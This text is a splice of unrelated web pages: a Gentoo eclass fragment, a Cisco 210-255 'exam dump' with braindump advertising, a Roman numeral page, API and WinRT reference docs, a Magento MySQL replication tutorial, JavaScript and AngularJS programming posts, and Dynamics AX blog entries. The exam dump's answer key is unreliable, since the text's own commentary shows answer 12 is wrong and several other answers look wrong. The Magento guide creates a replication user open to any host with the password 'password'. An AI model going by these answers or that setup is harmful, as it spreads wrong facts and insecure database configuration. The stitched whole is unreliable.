        case ${E_LIVE_SOURCE} in
        svn) subversion_src_unpack;;
        git) git-2_src_unpack;;
        *)   die "eek!";;
        esac
    else
        unpack ${A}
    fi
    if ! has src_prepare ${ENLIGHTENMENT_EXPF} ; then
        cd "${S}" || die
        enlightenment_src_prepare
    fi
}

enlightenment_src_prepare() {
    epatch_user
    [[ -s gendoc ]] && chmod a+rx gendoc
    if [[ ${WANT_AUTOTOOLS} == "yes" ]] ; then
        [[ -d po ]] && eautopoint -f
        # autotools require README, when README.in is around, but README
        # is created later in configure step
        [[ -f README.in ]] && touch README
        export SVN_REPO_PATH=${ESVN_WC_PATH}
        eautoreconf
    fi
    epunt_cxx
    elibtoolize
}

enlightenment_src_configure() {
    # gstreamer sucks, work around it doing stupid stuff
    export GST_REGISTRY="${S}/registry.xml"
    has static-libs ${IUSE} && E_ECONF+=( $(use_enable static-libs static) )

    econf ${MY_ECONF} "${E_ECONF[@]}"
}

enlightenment_src_compile() {
    has src_configure ${ENLIGHTENMENT_EXPF} || enlightenment_src_configure

    V=1 emake || die

    if use doc ; then
        if [[ -x ./gendoc ]] ; then
            ./gendoc || die
        elif emake -j1 -n doc >&/dev/null ; then
            V=1 emake doc || die
        fi
    fi
}

enlightenment_src_install() {
    V=1 emake install DESTDIR="${D}" || die
    find "${D}" '(' -name CVS -o -name .svn -o -name .git ')' -type d -exec rm -rf '{}' \; 2>/dev/null
    for d in AUTHORS ChangeLog NEWS README TODO ${EDOCS}; do
        [[ -f ${d} ]] && dodoc ${d}
    done
    use doc && [[ -d doc ]] && dohtml -r doc/*
    if has static-libs ${IUSE} ; then
        use static-libs || find "${D}" -name '*.la' -exec rm -f {} +
    fi
}

fi
2017 March Cisco New 210-255: Implementing Cisco Cybersecurity Operations Exam Dumps (Full Version) Released Today!

Free INSTANT Download 210-255 Exam Dumps (PDF & VCE) 70Q&As from www.Braindump2go.com Today! 100% REAL Exam Questions! 100% Exam Pass Guaranteed!

1.|NEW 210-255 Exam Dumps (PDF & VCE) 70Q&As Download: http://www.braindump2go.com/210-255.html
2.|NEW 210-255 Exam Questions & Answers: https://1drv.ms/f/s!AvI7wzKf6QBjgn5gut7hxGLZ6xws

QUESTION 11
You see 100 HTTP GET and POST requests for various pages on one of your webservers. The user agent in the requests contains PHP code that, if executed, creates and writes to a new PHP file on the webserver. Which category does this event fall under as defined in the Diamond Model of Intrusion?
A. delivery
B. reconnaissance
C. action on objectives
D. installation
E. exploitation
Answer: D

QUESTION 12
Which string matches the regular expression r(ege)+x?
A. rx
B. regeegex
C. r(ege)x
D. rege+x
Answer: A

QUESTION 13
Refer to the exhibit (not included in this text version). Which type of log is this an example of?
A. syslog
B. NetFlow log
C. proxy log
D. IDS log
Answer: A

QUESTION 14
Which element can be used by a threat actor to discover a possible opening into a target network and can also be used by an analyst to determine the protocol of the malicious traffic?
A. TTLs
B. ports
C. SMTP replies
D. IP addresses
Answer: A

QUESTION 15
Which stakeholder group is responsible for containment, eradication, and recovery in incident handling?
A. facilitators
B. practitioners
C. leaders and managers
D. decision makers
Answer: A

QUESTION 16
Refer to the exhibit (not included in this text version). You notice that the email volume history has been abnormally high. Which potential result is true?
A. Email sent from your domain might be filtered by the recipient.
B. Messages sent to your domain may be queued up until traffic dies down.
C. Several hosts in your network may be compromised.
D. Packets may be dropped due to network congestion.
Answer: C

QUESTION 17
Drag and Drop Question
Refer to the exhibit. Drag and drop the element name from the left onto the correct piece of the NetFlow v5 record from a security event on the right.
Answer: (exhibit not included in this text version)

QUESTION 18
Which statement about threat actors is true?
A. They are any company assets that are threatened.
B. They are any assets that are threatened.
C. They are perpetrators of attacks.
D. They are victims of attacks.
Answer: B

QUESTION 19
Which data element must be protected with regards to PCI?
A. past health condition
B. geographic location
C. full name
D. recent payment amount
Answer: D

QUESTION 20
What mechanism does the Linux operating system provide to control access to files?
A. privileges required
B. user interaction
C. file permissions
D. access complexity
Answer: C

!!!RECOMMEND!!!

1.|NEW 210-255 Exam Dumps (PDF & VCE) 70Q&As Download: http://www.braindump2go.com/210-255.html
2.|NEW 210-255 Study Guide Video: https://youtu.be/3fI6ShLlZQo
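Answer keys in dumps like this are worth verifying mechanically. For Question 12, the quantifier + in r(ege)+x requires at least one occurrence of the group ege, so option A ("rx") cannot match, while option B ("regeegex" = r + ege + ege + x) does. A quick check with standard Python re (nothing vendor-specific):

```python
import re

pattern = re.compile(r"r(ege)+x")

# '+' means one or more repetitions of 'ege', so 'rx' contains zero and fails.
print(bool(pattern.fullmatch("rx")))        # False
print(bool(pattern.fullmatch("regex")))     # True  (one 'ege')
print(bool(pattern.fullmatch("regeegex")))  # True  (two 'ege's)
```

By this reading, option B matches and option A does not, so the dump's "Answer: A" looks wrong under standard regex semantics.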
19668 in Roman numerals

What is 19668 in Roman numerals? The number 19668 in Roman numerals is XIXDCLXVIII. That is, if you want to write the number 19668 in Roman numerals, you must use the symbols XIXDCLXVIII, since these Roman numerals are exactly equivalent to the number nineteen thousand six hundred sixty-eight. (Strictly speaking, standard Roman notation only reaches 3999; for larger numbers the thousands part — here XIX, for 19 × 1000 — is conventionally written with an overline, a vinculum, followed by DCLXVIII for 668.)

19668 = XIXDCLXVIII

How should the Roman numeral 19668 be read? Roman numerals that symbolize numbers should be read and written from left to right, in order from the largest to the smallest value. Therefore, if you find the number represented by XIXDCLXVIII in a text, it should be read in its natural numeric form. In other words, the Roman numeral representing the number 19668 should be read as "nineteen thousand six hundred sixty-eight".

How should the number 19668 be written in Roman numerals? The one rule that applies to writing any number in Roman numerals, for example the number 19668, is that they must always be written in capital letters.
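The decomposition used above — 19 for the thousands block, then 668 — is easy to reproduce programmatically. A small sketch (the overline cannot be typed in plain ASCII, so the thousands block is simply concatenated, matching the XIXDCLXVIII spelling used on this page):

```python
ROMAN = [
    (1000, "M"), (900, "CM"), (500, "D"), (400, "CD"),
    (100, "C"), (90, "XC"), (50, "L"), (40, "XL"),
    (10, "X"), (9, "IX"), (5, "V"), (4, "IV"), (1, "I"),
]

def to_roman(n):
    """Standard Roman numeral for 1..3999 using the greedy subtraction table."""
    out = []
    for value, symbol in ROMAN:
        while n >= value:
            out.append(symbol)
            n -= value
    return "".join(out)

def to_roman_large(n):
    """Above 3999: thousands block first (conventionally overlined), then the rest."""
    if n < 4000:
        return to_roman(n)
    thousands, rest = divmod(n, 1000)
    return to_roman(thousands) + (to_roman(rest) if rest else "")
```

For 19668 this yields XIX (the overlined part) followed by DCLXVIII, i.e. XIXDCLXVIII.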
Resource: Automated Test All Relationships ( /api/automatedtest/{id}/allrelationships )

A resource representing the set of relationships belonging to the Automated Test (includes the full graph of related entities, not just those which can be reached through destination and source->destination directed relationships).

This resource supports the following methods: GET

Methods

GET — Retrieves all relationships

Required Permissions
• TestManagement/ManageExecutions/View
• TestManagement/ManageRequirements/View
• TestManagement/ManageScripts/View
• TestManagement/ManageIncidents/View

Status Codes

These are the expected status codes returned by the service. In addition, some other status codes may be returned if either an internal error occurs or there is an authentication issue (such as an expired OAuth token).

Status           Description
200 - OK         Returned if the request was completed successfully.
403 - Forbidden  Returned if you do not have permission to view the relationships associated with this entity.
404 - NotFound   Returned if the entity does not exist.

Example - Retrieve Relationships

Retrieve relationships (the response is a generic example, and does not necessarily represent the type of relationships that would be returned for this Entity Type).
Request Headers

Key      Value             Description
Accept   application/json

Request Parameters

Key    Value                                  Description
{id}   5E2814AF-1800-4C8F-B7C8-2ED9FADF98D0   The ID of the entity to retrieve the relationships for

Response Headers

Key            Value                            Description
Content-Type   application/json; charset=utf-8

Response Body

{
  "EntityId": "8F00D2CE-6243-4956-AF89-60B7B9755A9B",
  "Number": "1",
  "Name": "Some Script",
  "EntityType": "TestScript",
  "AssignedTo": "joeb",
  "Status": "Draft",
  "Priority": "High",
  "Type": "Functional",
  "PackageId": "c232382b-0c66-475b-b59b-8753d4c5377b",
  "PackageName": "Cycle 1",
  "PackageEntityType": "ScriptPackage",
  "PackagePath": "/Script Library/Cycle 1",
  "RelationshipId": null,
  "RelationshipTypeKey": "ScriptToRequirementCoverage",
  "RelationshipType": "Coverage",
  "Relation": "Covered By",
  "RelationshipDirection": "Source -> Destination",
  "CanDelete": true,
  "CanEdit": false,
  "Children": [
    {
      "EntityId": "4155F037-B778-4E9D-B942-0CC237D51038",
      "Number": "2",
      "Name": "Some Requirement",
      "EntityType": "Requirement",
      "AssignedTo": "janed",
      "Status": "Draft",
      "Priority": "Medium",
      "Type": "Functional",
      "PackageId": "454bc5ca-3496-4abb-a69a-919bf5f3ca0b",
      "PackageName": "Cycle 1",
      "PackageEntityType": "RequirementPackage",
      "PackagePath": "/Requirements/Cycle 1",
      "RelationshipId": null,
      "RelationshipTypeKey": "ScriptToRequirementCoverage",
      "RelationshipType": "Coverage",
      "Relation": "Covered By",
      "RelationshipDirection": "Destination -> Source",
      "CanDelete": false,
      "CanEdit": true,
      "Children": [],
      "Links": [
        {
          "Href": "http://localhost/api",
          "Rel": "Entity"
        }
      ]
    }
  ],
  "Links": [
    {
      "Href": "http://localhost/api",
      "Rel": "Entity"
    }
  ]
}
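To give a feel for consuming this payload, the sketch below flattens the relationship tree by walking the Children arrays recursively. It operates on a trimmed copy of the sample body above (plain Python; no HTTP client involved):

```python
def flatten(node, depth=0):
    """Yield (depth, EntityType, Name) for a relationship node and all its children."""
    yield depth, node["EntityType"], node["Name"]
    for child in node.get("Children", []):
        yield from flatten(child, depth + 1)

# Trimmed-down version of the sample Response Body above.
sample = {
    "EntityType": "TestScript",
    "Name": "Some Script",
    "Children": [
        {"EntityType": "Requirement", "Name": "Some Requirement", "Children": []},
    ],
}

rows = list(flatten(sample))
# [(0, 'TestScript', 'Some Script'), (1, 'Requirement', 'Some Requirement')]
```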
Magento with MySQL Master-Slave Architecture

With MySQL replication we can configure the database so that a single master database replicates its data to multiple slaves, which then act as read-only copies.

Why would you need this kind of architecture? If your Magento store gets very little traffic and you have no concerns about performance or backups, you probably don't. But if you serve around 20,000 users a day and want a standing backup of your database to survive a disaster, it can be just the medicine your server needs.

With this architecture we split read-query traffic and write-query traffic across different servers, which improves reliability and performance compared with a single-database setup. As we know, in a simple database architecture, if the database goes down for any reason, the whole application hits a dead end — which is definitely not the case with a master-slave architecture.

The next question popping up in your mind is probably "what exactly is master-slave architecture?" We configure one database as the master and another as a slave, so that the master replicates its data to the slave. The slave can become the master when the primary master goes down, protecting your application from hitting a dead end.

Now, how does it help improve reliability and performance? When an application communicates with the database, it generates a much larger amount of read-query traffic than write-query traffic, so a single database handling both types of traffic simultaneously sees its performance drop as soon as site traffic increases. To overcome this problem, master-slave architecture divides the traffic over two databases: the master handles read and write queries, while the slave handles only read queries.
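The read/write split described above is ultimately an application-side decision: anything that modifies data goes to the master's connection, everything else to a slave. A toy illustration of that routing rule (the IP addresses match the setup used later; in Magento itself the split is configured declaratively in local.xml rather than in code like this):

```python
MASTER = "192.168.1.242"   # accepts reads and writes
SLAVE = "192.168.1.243"    # read-only replica

WRITE_VERBS = ("insert", "update", "delete", "replace", "create", "alter", "drop")

def pick_server(sql):
    """Route statements that modify data to the master, everything else to a slave."""
    first_word = sql.lstrip().split(None, 1)[0].lower()
    return MASTER if first_word in WRITE_VERBS else SLAVE
```

Under this rule the bulk of a storefront's traffic (catalog and page reads) lands on the slave, leaving the master free to absorb checkout and admin writes.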
We can manage the traffic accordingly from the application end and improve reliability and performance.

Real Facts and Figures

The figures below were recorded with siege at around 20 concurrent users per second. The performance gains will show more clearly once we test at larger scale, around 10,000 concurrent users per second.

[Charts omitted: MySQL queries when Magento and the MySQL database share one server; query execution on the master database; query execution on the slave database.]

MySQL Master-Slave Implementation on Magento

1. Prepare three servers running Ubuntu (with Vagrant or any other virtualization method). Install MySQL server on two of them and Magento on the third.

2. Assume the three servers have the following IP addresses:
Magento: 192.168.1.241
Master: 192.168.1.242
Slave: 192.168.1.243

3. Edit the MySQL configuration file of the master server, located at /etc/mysql/my.cnf:
- Change the line bind-address = 127.0.0.1 to bind-address = 192.168.1.242
- Uncomment the line server-id = 1 and give the server a unique ID; in our case we use 1.
- Uncomment log_bin = /var/log/mysql/mysql-bin.log
Save the changes and restart MySQL with the command: sudo service mysql restart

4. Edit the MySQL configuration file of the slave server, also at /etc/mysql/my.cnf:
- Change bind-address = 127.0.0.1 to bind-address = 192.168.1.243
- Uncomment the server-id line and give it a unique ID; in our case we use server-id = 2.
Save the changes and restart MySQL with the command: sudo service mysql restart

5. Log in to the master server over SSH and open the MySQL command line with your credentials:
mysql -u root -p

6.
Create a user for replication on the master — here named "replicate" — with the following command:
create user 'replicate'@'%' identified by 'password';
This creates a user that can log in from any IP address with the given password.

7. Grant replication privileges on all databases to the 'replicate' user:
grant replication slave on *.* to 'replicate'@'%';

8. Create a sample database for testing purposes:
create database languages;
create table languages.oops (name varchar(20));
insert into languages.oops values ('java');

9. Take a dump of the whole database schema:
mysqldump -uroot --all-databases --master-data > masterdump.sql
Then check the master_log_file and master_log_position with:
grep CHANGE *sql | head -1

10. Transfer the MySQL dump file to the slave server using scp or any other utility.

11. Log in to the slave's MySQL command shell and tell the slave about the master:
change master to master_host = '192.168.1.242', master_user = 'replicate', master_password = 'password';
exit

12. Restore the dump on the slave MySQL server:
mysql -uroot -p < masterdump.sql

13. Log in to the MySQL shell of the slave server and start the slave:
start slave;

14. Check the status of the slave with:
show slave status;

15. Now any element you add in the master MySQL database is automatically replicated on the slave.

16. Now switch to the server on which you have installed Magento.
Edit the /app/etc/local.xml file of your Magento installation:

<default_setup>
    <connection>
        <host><![CDATA[192.168.1.242]]></host>
        <username><![CDATA[username]]></username>
        <password><![CDATA[password]]></password>
        <dbname><![CDATA[magento]]></dbname>
        <active>1</active>
    </connection>
</default_setup>
<default_read>
    <connection>
        <use/>
        <host><![CDATA[192.168.1.243]]></host>
        <username><![CDATA[username]]></username>
        <password><![CDATA[password]]></password>
        <dbname><![CDATA[magento]]></dbname>
        <type>pdo_mysql</type>
        <model>mysql4</model>
        <initStatements>SET NAMES utf8</initStatements>
        <active>1</active>
    </connection>
</default_read>

17. You can now test reliability and performance using the munin or tcptrack utilities on Ubuntu.

Conclusion

MySQL master-slave replication has pros as well as cons. It divides read-query and write-query traffic, though the slave still performs the writes locally because it executes all the updates performed on the master. Even so, this architecture helps you increase functionality and reliability by giving you a standing backup of your database in the form of the slave. So we can say that if you want a backup as well as high performance, you can implement this architecture on your Magento store.
      Tutorial: init method init method Tutorial Details: init method Read Tutorial init method. Rate Tutorial: init method View Tutorial: init method Related Tutorials: Displaying 1 - 50 of about 8440 Related Tutorials. init method init method  why init method used in servlet?   The init() method is called only once by the servlet container throughout the life of a servlet. By this init() method the servlet get to know that it has been placed   Servlet Init method Servlet Init method  can we capture the form data into the init method of the servlet   init method of ActionServlet and RequestProcessor init method of ActionServlet and RequestProcessor  hi every when the ActionServlet init() method is executed? please give answer for the above query   init Method in Spring init Method in Spring       Calling Bean using init() method in Spring, this section describes ... the init method as shown below:- <bean id="mybean" class   Why servletcontainer can,t call the Init() method ? Why servletcontainer can,t call the Init() method ?  Why servletcontainer can,t call the Init() method   init Method in Spring init Method in Spring       Calling Bean using init() method in Spring, this section... the init() method .Here we have defined the property and values of  the bean   init Method in Spring init Method in Spring       Calling Bean using init() method in Spring, this section describes ... the init method as shown below:- <bean id="mybean" class   Counter in Init() Method : #000000; } Counter in Init() Method     .... In this program we are going to make use of the init method of the Servlet interface... which will have the initial value of the counter. The init() method accepts   Getting Init Parameter Names on the browser. To retrieve all the values of the init parameter use method... 
Getting Init Parameter Names       In this example we are going to retreive the init paramater   Init Parameter Init Parameter  How set Init Parameter in servlet   difference between init() & init(ServletConfig config)? difference between init() & init(ServletConfig config)?  I want to know the difference between init() and init(ServletConfig config) methods in GenericServlet   Access web.xml init parameters Access web.xml init parameters  How to access web.xml init parameters from java code   Init param - Java Beginners Init param  What is the correct syntax of init param?  Hello,Init parameters are added between the <init-param></init-param>...-name> <init-param> <param-name>emailHost</param-name>   Methods of Servlets (ServletConfig config) throws ServletException The init() method is called only...; The servlet cannot be put into the service if  The init() method does... a ServletException Parameters - The init() method takes a ServletConfig object   help to load information in init of application - Struts help to load information in init of application  Thanks for ur... question related to struts2 framework I want to keep some data in init... that is in init of the application , please remember, i am using struts2   what is web .config method ? For overriding init()method any rules are there There are no necessary conditions to override this particular method. In case you are overridding init... *The servlet is initialized by calling the init () method. *The servlet calls   What values initialized inside init() in servlet - Java Interview Questions What values initialized inside init() in servlet  What will happen inside init() in servlet. my interviewer asked servlet lifecycle. i said "once servlet is loaded in to memory init() will be called which performs servlet   how to maKE Jcombox editable after saveing value init. how to maKE Jcombox editable after saveing value init.  
Helpful JavaScript Design Patterns

So you write JavaScript. That's pretty much a given for today's modern web apps. Unfortunately, JavaScript doesn't always get the organization it deserves and ends up being a procedural mess of jQuery on-ready statements. In this post, I'm going to show you two of my favorite patterns for keeping JavaScript well organized. But before I do, let's go over a few prerequisites.

Namespace Your Code

One of the worst and most common JavaScript mistakes is assigning variables onto the global namespace (aka 'window') if you're running JavaScript in a browser. This can lead to conflicting functions between you and other developers. And is just, well, messy. The best way to avoid this is namespacing, as shown in this example:

[sourcecode language="javascript"] window.NR = window.NR || {}; window.NR.myFunction = function () { // your code… }; [/sourcecode]

And avoid this example:

[sourcecode language="javascript"] function myFunction () { // your code… }; [/sourcecode]

Use Strict Mode

Even inside a namespaced function, there can still be a problem. You can accidentally assign variables to the global namespace. To prevent this, prefix all variable declarations with var or this. Alternatively, you can use strict mode. As the name implies, strict mode parses your JavaScript in a much stricter fashion. For example, if you attempt to set a variable that is not yet defined, it will throw an error instead of assigning to global / window. If you're interested in learning more about strict mode, check out this article on John Resig's blog.

Lint Your JavaScript

JSLint evaluates your JavaScript against Douglas Crockford's coding suggestions. There are plugins for most of the popular editors, including Sublime Text 2, TextMate and Vim. The main benefits of using JSLint are:

* Your code is checked for errors before running, saving you time and debugging effort.
* Sharing linted code in a team unifies coding styles, making code more readable and consistent.

Even if you disagree with some of Douglas's assertions about how your code should be formatted, you should still use JSLint. You can opt out of the rules with preference settings or comments at the top of your JavaScript file. I prefer using comments because they get parsed the same way when another developer works on your file. This prevents you from getting conflicting parsing results when one of your teammates sets different preferences. To give you an example, here are my standard JSLint configuration comments:

[sourcecode language="javascript"] /*global NR:true, jQuery:true, Backbone:true, $:true*/ /*jslint browser: true, white: true, vars: true, devel: true, bitwise: true, debug: true, nomen: true, sloppy: false, indent: 2*/ [/sourcecode]

The global declarations tell JSLint which variables to expect on the global namespace – jQuery, Backbone, etc. If it encounters others, it will throw an error. The JSLint options determine which rules are opted into or out of. See the full list of rules on the JSLint website.

OK! Now that's out of the way, let's look at a couple of JavaScript patterns I commonly use.

The Module

The module pattern is great if you only need one, such as in a navigation system, and you want to be able to access the object from any scope. By convention, a module should be camelCased with a lower-case first letter. There are many benefits and drawbacks to using the module pattern:

Pros:

* There's no need to instantiate; just begin calling methods on it.
* It's accessible from anywhere. There's no need to retain a handle to your instance.
* It keeps state and variable values.

Cons:

* You can only have one. Don't make ten of these for each type of item on the DOM or a similar situation.
* You don't have a constructor function, so it won't be fired automatically like with an instance.
* If you need initialization on the module, you need to call it manually the first time it's used.

Here's an example module:

[sourcecode language="javascript"] (function () { "use strict"; window.NR = window.NR || {}; window.NR.myModule = { myVariable: "foo", initialize: function () { // your initialization code here }, anotherMethod: function () { this.myVariable = "foobar"; } }; }()); [/sourcecode]

And here's how it can be used:

[sourcecode language="javascript"] NR.myModule.initialize(); NR.myModule.anotherMethod(); console.log(NR.myModule.myVariable); // outputs // "foobar" [/sourcecode]

Classes

Some people will argue that you should never use 'new' when working with JavaScript, as there are no true classes in the language. However, I find this pattern extremely helpful for a number of reasons described below. Also, many popular frameworks such as Backbone use class instantiation / extension patterns. The naming convention for classes is CamelCase with an upper-case first letter. Some of the benefits of this pattern are:

* It's great for when you have many of an item and each needs its own state.
* It's a familiar OOP pattern / workflow for many developers.
* It has a constructor function that's immediately fired on instantiation.

But the drawbacks are:

* You have to remember to instantiate before you can use it. If you don't, it will cause errors.
* You have to keep a handle to the instance that's returned from the constructor.
Here's an example class:

[sourcecode language="javascript"] window.NR = window.NR || {}; window.NR.MyClass = (function () { "use strict"; function MyClass(val) { this.instanceVar = MyClass.staticVar + val; } MyClass.staticVar = "prefix-"; var instanceVar = ""; MyClass.prototype.exampleFunction = function () { alert('i am an additional function'); }; return MyClass; }()); [/sourcecode]

And how it can be used:

[sourcecode language="javascript"] var instance1 = new NR.MyClass('class 1'); console.log(instance1.instanceVar); NR.MyClass.staticVar = 'PREFIX-'; var instance2 = new NR.MyClass('class 2'); console.log(instance2.instanceVar); // Outputs // "prefix-class 1" // "PREFIX-class 2" [/sourcecode]

Summary

I hope these patterns help you keep your JavaScript better organized. What other patterns do you use? Share yours in the comments below.
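As a quick, framework-free sketch of the strict-mode point from earlier: assigning to an undeclared name throws a ReferenceError instead of silently creating a global. The root lookup and the strictDemo name are illustrative additions (the root check just lets the same snippet run in a browser or in Node):

```javascript
// Pick the global object: window in a browser, globalThis in Node.
var root = typeof window !== "undefined" ? window : globalThis;

root.NR = root.NR || {};

root.NR.strictDemo = function () {
  "use strict";
  try {
    // No var/this prefix: in sloppy mode this would silently create
    // a global variable; strict mode throws a ReferenceError instead.
    leaked = "oops";
  } catch (e) {
    return e instanceof ReferenceError;
  }
  return false;
};
```

Calling NR.strictDemo() returns true, and no leaked variable ends up on the global object.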
DoubleKeyFrameCollection.GetMany(UInt32, DoubleKeyFrame[]) Method

Definition

Retrieves multiple elements in a single pass through the iterator.

public : unsigned int GetMany(unsigned int startIndex, DoubleKeyFrame[] items)
uint32_t GetMany(uint32_t startIndex, DoubleKeyFrame[] items) const;
public uint GetMany(UInt32 startIndex, DoubleKeyFrame[] items)
Public Function GetMany(startIndex As UInt32, items As DoubleKeyFrame[]) As uint

Parameters

startIndex UInt32
The index from which to start retrieval.

items DoubleKeyFrame[]
Provides the destination for the result. Size the initial array as a capacity in order to specify how many results should be retrieved.

Returns

uint
The number of items retrieved.

Remarks

The GetMany method operates identically as if calling Current and MoveNext for each element in the supplied array. This means that the first element returned by the GetMany method is the same element as returned by retrieving the Current property prior to calling GetMany. After the GetMany call returns, the Current property will retrieve the element following the last element returned by the GetMany call, or produce an error if no more elements exist in the sequence.

The GetMany method returns the actual number of elements returned. It must be the minimum of a) the number of elements remaining in the collection, or b) the number of elements requested, that is, capacity. Therefore, whenever GetMany returns less than the number of elements requested, the end of the sequence has been reached. It returns the number of elements retrieved in the actual output parameter.

When the caller specifies a capacity of zero, the position of the iterator is unchanged. Elements in the array following the values returned are unchanged.
Mike - 6 months ago
31
AngularJS Question: Store JSON file contents on load

Right now, I have a factory which loads a JSON file.

angular.module("app").factory("RolesFactory", ['$http', '$q', function($http, $q) {
    var d = $q.defer();
    $http.get('events.json').success(function(data) {
        d.resolve(data);
    });
    return d.promise;
}]);

And then I call this factory when I need the contents of events.json with this controller:

App.controller('rolesCtrl', ['$scope', 'RolesFactory', function($scope, RolesFactory) {
    RolesFactory.then(function(roleData){
        $scope.roles = roleData.roles;
    });
}]);

All good, but whenever I need to use this data, isn't it refetching the contents of events.json? In other words, is Angular reloading the file over and over again? I was hoping to load the file once and call it by a global variable or something. When my app loads initially, I want it to load and store the contents of events.json, and then I'd like my app to be able to use this data whenever/wherever. Is this possible?

Answer

As AngularJS is a stateless framework, you have only a few options here, all of which are some kind of client-side caching:

1. Use localStorage to store your data. Once the data is fetched, you can just save it to localStorage using localStorage.setItem after stringifying the JSON. You'll need to re-parse the JSON the next time you use it though, so if this is a giant JSON, this is not the best idea.
2. Use sessionStorage to store your data. This is exactly the same as #1, but you will lose the data upon termination of the session, i.e. closing your browser.
3. Trust the JSON to be cached in your browser. This is most likely the case. Static assets are by default cached by most modern browsers. So, the second time your factory requests the JSON, the resource isn't actually fetched from the server. It is merely pulled from the browser's cache.

NOTE: The way to check this is to see what the HTTP status code for your resource is, in Chrome's Developer Tools Network tab.
If the status says 304, that means it has been pulled from cache.
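Option #1 above can be sketched without any framework. Everything here is illustrative: cachedGetJson, the storage parameter (standing in for window.localStorage, which has the same getItem/setItem API) and fetchJson (standing in for the $http.get call) are not names from the question:

```javascript
// Sketch of option #1: cache the parsed JSON in a storage object.
// On a cache hit we re-parse the stored string; on a miss we fetch
// and store the stringified result, so the fetch runs only once.
function cachedGetJson(key, storage, fetchJson) {
  var cached = storage.getItem(key);
  if (cached !== null) {
    return JSON.parse(cached); // re-parse on every read
  }
  var data = fetchJson();      // hits the server only on a cache miss
  storage.setItem(key, JSON.stringify(data));
  return data;
}
```

With real localStorage you would call it as cachedGetJson('events', window.localStorage, ...), keeping in mind the re-parse cost for very large JSON noted above.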
Advanced cross-reference search.

Cross-reference is one of the best tools we have in AX and is used by developers daily; however, not everyone uses it to its full potential. Recently, I was asked how to find cross-references for a kernel method that is not defined on a table, because you cannot right-click on it 😊

And that's a good question: often we want to find out if there is a call to doUpdate or doInsert somewhere. In AX 2012 go to Tools -> Cross-reference -> Names, filter by table or method name and then click Used by.

SalesLine.DoUpdate_Names
SalesLine.DoUpdate_UsedBy

Using this form, we can find usage of CLR types as well, for example, Microsoft.Dynamics.IntegrationFramework. It is defined in the AOT under the References node; however, from there you cannot find any references. Names would show you everything!

CLRTypeUsage

What about D365FOE? As we know, it's a bit different here. Cross-reference data has moved to the DYNAMICSXREFDB database.

DYNAMICSXREFDB

And it makes perfect sense, because you need to pay for each GB of DB space in Production. Using the following SQL statement, we can find usage of any object. For example, Microsoft.Dynamics.IntegrationFramework:

SELECT sourceName.[Path] as sourcePath, targetName.[Path] as targetPath, [Kind], [Line], [Column],
       sourceModule.[Module] as sourceModule, targetModule.[Module] as targetModule
FROM dbo.[References]
INNER JOIN dbo.[Names] sourceName ON dbo.[References].[SourceId] = sourceName.[Id]
INNER JOIN dbo.[Modules] sourceModule ON sourceName.[ModuleId] = sourceModule.[Id]
INNER JOIN dbo.[Names] targetName ON dbo.[References].[TargetId] = targetName.[Id]
INNER JOIN dbo.[Modules] targetModule ON targetName.[ModuleId] = targetModule.[Id]
WHERE targetName.[Path] like '%Microsoft.Dynamics.IntegrationFramework%'

CLRTypeUsage_D365FOE

Where Kind is:

/// <summary>
/// Types of Cross References
/// </summary>
public enum CrossReferenceKind
{
    /// <summary>
    /// Type not specified.
    /// Used for queries
    /// </summary>
    Any = 0,

    /// <summary>
    /// Indicates that the reference is a Method Call
    /// </summary>
    MethodCall = 1,

    /// <summary>
    /// Type reference
    /// Indicates that the type is used (variable and field declaration, attributes, function return type, etc)
    /// </summary>
    TypeReference = 2,

    /// <summary>
    /// Interface implementation
    /// Indicates that the source entity is implementing this interface
    /// </summary>
    InterfaceImplementation = 3,

    /// <summary>
    /// Class Extended
    /// Indicates that the source entity is extending this class or interface
    /// </summary>
    ClassExtended = 4,

    /// <summary>
    /// Test Call
    /// Indicates that the source entity (test) directly or indirectly calls an application method.
    /// </summary>
    TestCall = 5,

    /// <summary>
    /// Property
    /// Indicates that the source entity has a certain property.
    /// </summary>
    Property = 6,

    /// <summary>
    /// Attribute reference
    /// Indicates that an Attribute is used
    /// </summary>
    Attribute = 7,

    /// <summary>
    /// Test Helper Call
    /// Indicates that the source entity is a test helper.
    /// </summary>
    TestHelperCall = 8,

    /// <summary>
    /// Metadata or code Tag reference
    /// Indicates that the source tag is used on a metadata element, class or a method or a line of code.
    /// </summary>
    Tag = 9,
}

Let's try doUpdate:

DoUpdate_UsedBy_D365FOE

As we can see, the result is different from AX 2012, where we could search for an individual table; now all Common methods have a reference to Common.

D365FOE. FormHasMethod extension for form extension methods.

Recently I have seen multiple people asking how to check if a form has a method added by extension at run-time. For form methods we can use Global::formHasMethod, but it does not work with form extensions. I advised people to use the new metadata API to do this, and finally community user Axaptus wrote the code! I tweaked it a bit to ignore the method's name case, as AX does, and to exclude private methods.
Also I used it to extend standard formHasMethod method /// <summary> /// The class <c>Global_Extension</c> contains extension methods for the <c>Global</c> class. /// </summary> [ExtensionOf(classStr(Global))] public static final class Global_Extension { static boolean formHasMethod(FormRun fr, IdentifierName methodName) { boolean ret = next formHasMethod(fr, methodName); if (!ret) { ret = Global::formExtensionHasMethod_IM(fr, methodName); } return ret; } private static boolean formExtensionHasMethod_IM(FormRun _formRun, IdentifierName _methodName) { if (!_formRun || !_methodName) { return false; } try { System.Object[] extensions = Microsoft.Dynamics.Ax.Xpp.ExtensionClassSupport::GetExtensionsOnType(_formRun.GetType(), true); if (extensions) { System.Type formRunExtensionType; System.Reflection.MethodInfo methodInfo; //extension methods are always static var bindingFlags = BindingFlags::Public | BindingFlags::Static | BindingFlags::IgnoreCase; for (int i = 0; i < extensions.Length; i++) { formRunExtensionType = extensions.GetValue(i); var methodsInfo = formRunExtensionType.GetMethods(bindingFlags); for (int n = 0; n < methodsInfo.get_Length(); n++) { methodInfo = methodsInfo.getValue(n); if (methodInfo.Name == _methodName) { return true; } } } } } catch (Exception::CLRError) { error(CLRInterop::getLastException().ToString()); } return false; } } Extending standard method has its pros and cons. From one side it will slow down execution of standard code that calls it when method does not exist, but it’s a rare case. From another side it allows you to reuse standard code without changing it and it could be handy in various places where AX looks for a method on a form. Source code is available on GitHub D365FOE. Issue with enums that have “Use Enum Value” property set to “No”. Recently we have noticed incorrect behavior of enums that have “Use Enum Value” set to “No” and have gaps in enum values. 
These enums use values from properties when populated from the user interface; however, X++ code uses generated values, which causes inconsistent behavior and data corruption.

To illustrate this issue, we will create a new enum with two values: 0 and 10. Also we need to set the "Use Enum Value" property to "No".

MyEnum
MyEnumProperties

Zero:
MyEnumZero

Ten:
MyEnumTen

Also, we need a simple table that has only one field, a form to populate this field from the UI and a job to create data from X++.

Table:
MyTable

Form:
MyForm

Runnable class:
RunnableClass

